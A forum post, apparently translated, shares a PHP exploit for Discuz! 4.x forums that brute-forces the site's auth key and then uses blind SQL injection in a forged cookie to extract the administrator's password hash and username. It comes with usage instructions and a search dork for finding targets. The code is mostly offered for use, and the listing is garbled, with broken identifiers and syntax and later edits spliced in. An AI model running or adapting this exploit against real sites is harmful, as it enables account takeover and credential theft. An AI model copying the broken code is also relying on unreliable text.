Some time ago I posted an EXP (exploit) for Discuz! 5.0.0 GBK.
Today I saw the 4.x version on CN.Tink, went to the original site, and tested it against a Discuz! 4.1.0 installation; the test succeeded. See below. Some people did not know how to use the Discuz! 5.0.0 GBK EXP, and some of my friends still did not understand it after I explained it, so this time I have included a screenshot; if you did not know how to use it before, it should be clear now.
Figure:
The code is as follows: <? Php
Print_r ('
---------------------------------------------------------------------------
Discuz! 4. x SQL injection/admin credentials disclosure exploit
By rgod rgod@autistici.org
Site: http://retrogod.altervista.org
Dork: "powered by discuz!
---------------------------------------------------------------------------
');
If ($ argc <3 ){
Print_r ('
---------------------------------------------------------------------------
Usage: php '. $ argv [0]. 'Host path OPTIONS
Host: target server (ip/hostname)
Path: path to discuz
Options:
-P [port]: specify a port other than 80
-P [ip: port]: specify a proxy
Example:
Php '. $ argv [0]. 'localhost/discuz/-P1.1.1.1: 80
Php '. $ argv [0]. 'localhost/discuz/-p81
---------------------------------------------------------------------------
');
Die;
}
Error_reporting (0 );
Ini_set ("max_execution_time", 0 );
Ini_set ("default_socket_timeout", 5 );
// Hex-dump helper: returns a two-column rendering of $string -- first the hex
// column (one zero-padded two-digit value per byte), then a CRLF, then the
// printable column, where any byte <= 32 or > 126 is shown as '.'.
// Both columns get a CRLF after every 15 bytes.
// NOTE(review): this listing is extraction-garbled (spaces inserted inside
// identifiers and operators); the original source must be consulted before
// relying on any token here. quick_dump is not called anywhere in this listing.
Function quick_dump ($ string)
{
$ Result = ''; $ exa =''; $ cont = 0;
For ($ I = 0; $ I <= strlen ($ string)-1; $ I ++)
{
// Printable column: control bytes and high bytes are masked with '.'.
If (ord ($ string [$ I]) <= 32) | (ord ($ string [$ I])> 126 ))
{$ Result. = ".";}
Else
{$ Result. = "". $ string [$ I];}
// Hex column: left-pad single-digit values so every byte occupies two chars.
If (strlen (dechex (ord ($ string [$ I]) = 2)
{$ Exa. = "". dechex (ord ($ string [$ I]);}
Else
{$ Exa. = "0". dechex (ord ($ string [$ I]);}
// Wrap both columns after 15 bytes.
$ Cont ++; if ($ cont = 15) {$ cont = 0; $ result. = "\ r \ n"; $ exa. = "\ r \ n ";}
}
// Hex column first, then the printable column.
Return $ exa. "\ r \ n". $ result;
}
$ Proxy_regex = '(\ B \ d {1, 3 }\. \ d {1, 3 }\. \ d {1, 3 }\. \ d {1, 3 }\:\ d {1, 5} \ B )';
Function sendpacketii ($ packet)
{
Global $ proxy, $ host, $ port, $ html, $ proxy_regex;
If ($ proxy = ''){
$ Ock = fsockopen (gethostbyname ($ host), $ port );
If (! $ Ock ){
Echo 'no response from '. $ host.': '. $ port; die;
}
}
Else {
$ C = preg_match ($ proxy_regex, $ proxy );
If (! $ C ){
Echo 'not a valid proxy... '; die;
}
$ Parts = explode (':', $ proxy );
Echo "Connecting to". $ parts [0]. ":". $ parts [1]. "proxy... \ r \ n ";
$ Ock = fsockopen ($ parts [0], $ parts [1]);
If (! $ Ock ){
Echo 'no response from proxy... '; die;
}
}
Fputs ($ ock, $ packet );
If ($ proxy = ''){
$ Html = '';
While (! Feof ($ ock )){
$ Html. = fgets ($ ock );
}
}
Else {
$ Html = '';
While ((! Feof ($ ock) or (! Eregi (chr (0x0d). chr (0x0a). chr (0x0d). chr (0x0a), $ html ))){
$ Html. = fread ($ ock, 1 );
}
}
Fclose ($ ock );
}
$ Host = $ argv [1];
$ Path = $ argv [2];
$ Port = 80;
$ Proxy = "";
For ($ I = 3; $ I <$ argc; $ I ++ ){
$ Temp = $ argv [$ I] [0]. $ argv [$ I] [1];
If ($ temp = "-p ")
{
$ Port = str_replace ("-p", "", $ argv [$ I]);
}
If ($ temp = "-P ")
{
$ Proxy = str_replace ("-P", "", $ argv [$ I]);
}
}
If ($ path [0] <> '/') or ($ path [strlen ($ path)-1] <> '/')) {echo 'error... check the path! '; Die ;}
If ($ proxy = '') {$ p = $ path;} else {$ p = 'HTTP ://'. $ host. ':'. $ port. $ path ;}
Echo "please wait... \ n ";
// From global. func. php
Function authcode ($ string, $ operation, $ key = ''){
$ Key = $ key? $ Key: $ GLOBALS ['discuz _ auth_key '];
$ Coded = '';
$ Keylength = 32;
$ String = $ operation = 'decode '? Base64_decode ($ string): $ string;
For ($ I = 0; $ I <strlen ($ string); $ I ++ = 32 ){
$ Coded. = substr ($ string, $ I, 32) ^ $ key;
}
$ Coded = $ operation = 'encoding '? Str_replace ('=', '', base64_encode ($ coded): $ coded;
Return $ coded;
}
// Stolen from install. php
Function random ($ length ){
$ Hash = '';
$ Chars = 'abcdefghijklmnopqrstuvwxyz0123456789abcdefghijklmnopqrstuvwxy ';
$ Max = strlen ($ chars)-1;
Mt_srand (double) microtime () * 1000000 );
For ($ I = 0; $ I <$ length; $ I ++ ){
$ Hash. = $ chars [mt_rand (0, $ max)];
}
Return $ hash;
}
$ Agent = "Googlebot/2.1 ";
// See SQL errors... you need auth key,
// It's a value mixed up with the random string in cache_settigns.php and your user-agent, so let's ask
$ Tt = ""; for ($ I = 0; $ I <= 255; $ I ++) {$ tt. = chr ($ I );}
While (1)
{
$ Discuz_auth_key = random (32 );
$ Packet = "GET". $ p. "admincp. php? Action = recyclebin HTTP/1.0 \ r \ n ";
$ Packet. = "CLIENT-IP: 999.999.999.999 \ r \ n"; // spoof
$ Packet. = "User-Agent: $ agent \ r \ n ";
$ Packet. = "Host:". $ host. "\ r \ n ";
$ Packet. = "Cookie: adminid = 1; cdb_sid = 1; cdb_auth = ". authcode ("suntzu \ tsuntzu \ t ". $ tt, "ENCODE "). "; \ r \ n ";
$ Packet. = "Accept: text/plain \ r \ n ";
$ Packet. = "Connection: Close \ r \ n ";
$ Packet. = $ data;
Sendpacketii ($ packet );
$ Html = html_entity_decode ($ html );
$ Html = str_replace ("<br/>", "", $ html );
$ T = explode ("AND m. password = '", $ html );
$ T2 = explode ("'", $ t [1]);
$ Pwd_f = $ t2 [0];
$ T = explode ("AND m. secques = '", $ html );
$ T2 = explode ("'\ n", $ t [1]);
$ Secques_f = $ t2 [0];
$ T = explode ("AND m. uid = '", $ html );
$ T2 = explode ("'\ x0d", $ t [1]);
$ Uid_f = $ t2 [0];
$ My_string = $ pwd_f. "\ t". $ secques_f. "\ t". $ uid_f;
If (strlen ($ my_string) = 270) and (! Eregi ("=", $ my_string ))){
Break;
}
}
$ Temp = authcode ("suntzu \ tsuntzu \ t". $ tt, "ENCODE ");
// Calculating key...
$ Key = "";
For ($ j = 0; $ j <32; $ j ++ ){
For ($ I = 0; I I <255; $ I ++ ){
$ Aa = "";
If ($ j <> 0 ){
For ($ k = 1; $ k <= $ j; $ k ++ ){
$ Aa. = "";
}
}
$ GLOBALS ['discuz _ auth_key '] = $ aa. chr ($ I );
$ T = authcode ($ temp, "DECODE ");
If ($ t [$ j] ==$ my_string [$ j]) {
$ Key. = chr ($ I );
}
}
}
// Echo "auth key->". $ key. "\ r \ n ";
$ GLOBALS ['discuz _ auth_key '] = $ key;
Echo "pwd hash (md5)-> ";
$ Chars [0] = 0; // null
$ Chars = array_merge ($ chars, range (48, 57); // numbers
$ Chars = array_merge ($ chars, range (97,102); // a-f letters
$ J = 1; $ password = "";
While (! Strstr ($ password, chr (0 )))
{
For ($ I = 0; $ I <= 255; $ I ++)
{
If (in_array ($ I, $ chars ))
{
// You can use every char because of base64_decode ()... so this bypass magic quotes...
// And some help by extract () to overwrite vars
$ SQL = "999999 '/**/UNION/**/SELECT, (IF (ASCII (SUBSTRING (m. password, $ j, 1) = ". $ I., 1, 1/**/FROM/**/cdb_sessions/**/s, /**/cdb_members/**/m/**/WHERE/**/adminid = 1/**/LIMIT/**/1 /*";
$ Packet = "GET". $ p. "admincp. php? Action = recyclebin & HTTP/1.0 \ r \ n ";
$ Packet. = "User-Agent: $ agent \ r \ n ";
$ Packet. = "CLIENT-IP: 1.2.3.4 \ r \ n ";
$ Packet. = "Host:". $ host. "\ r \ n ";
$ Packet. = "Cookie: adminid = 1; cdb_sid = 1; cdb_auth = ". authcode ("suntzu \ tsuntzu \ t ". $ SQL, "ENCODE "). "; \ r \ n ";
$ Packet. = "Accept: text/plain \ r \ n ";
$ Packet. = "Connection: Close \ r \ n ";
$ Packet. = $ data;
Sendpacketii ($ packet );
If (eregi ("action = groupexpiry", $ html )){
$ Password. = chr ($ I); echo chr ($ I); sleep (1); break;
}
}
If ($ I == 255 ){
Die ("\ nExploit failed ...");
}
}
$ J ++;
}
Echo "\ nadmin user-> ";
$ J = 1; $ admin = "";
While (! Strstr ($ admin, chr (0 )))
{
For ($ I = 0; $ I <= 255; $ I ++)
{
$ SQL = "999999 '/**/UNION/**/SELECT, (IF (ASCII (SUBSTRING (m. username, $ j, 1) = ". $ I., 1, 1/**/FROM/**/cdb_sessions/**/s, /**/cdb_members/**/m/**/WHERE/**/adminid = 1/**/LIMIT/**/1 /*";
$ Packet = "GET". $ p. "admincp. php? Action = recyclebin & HTTP/1.0 \ r \ n ";
$ Packet. = "User-Agent: $ agent \ r \ n ";
$ Packet. = "CLIENT-IP: 1.2.3.4 \ r \ n ";
$ Packet. = "Host:". $ host. "\ r \ n ";
$ Packet. = "Cookie: adminid = 1; cdb_sid = 1; cdb_auth = ". authcode ("suntzu \ tsuntzu \ t ". $ SQL, "ENCODE "). "; \ r \ n ";
$ Packet. = "Accept: text/plain \ r \ n ";
$ Packet. = "Connection: Close \ r \ n ";
$ Packet. = $ data;
Sendpacketii ($ packet );
If (eregi ("action = groupexpiry", $ html )){
$ Admin. = chr ($ I); echo chr ($ I); sleep (1); break;
}
If ($ I = 255) {die ("\ nExploit failed ...");}
}
$ J ++;
}
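// True when $hash, after trim(), is exactly 32 lowercase hex digits (the
// textual form of an MD5 digest); false otherwise.
// The original used ereg() -- removed in PHP 7 -- and anchored only the start
// of the pattern, so any string that merely *began* with 32 hex characters was
// accepted. preg_match with \A ... \z checks the whole trimmed string.
function is_hash($hash)
{
    return (bool) preg_match('/\A[a-f0-9]{32}\z/', trim($hash));
}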
If (is_hash ($ password )){
Echo "exploit succeeded ...";
}
Else {
Echo "exploit failed ...";
}
?>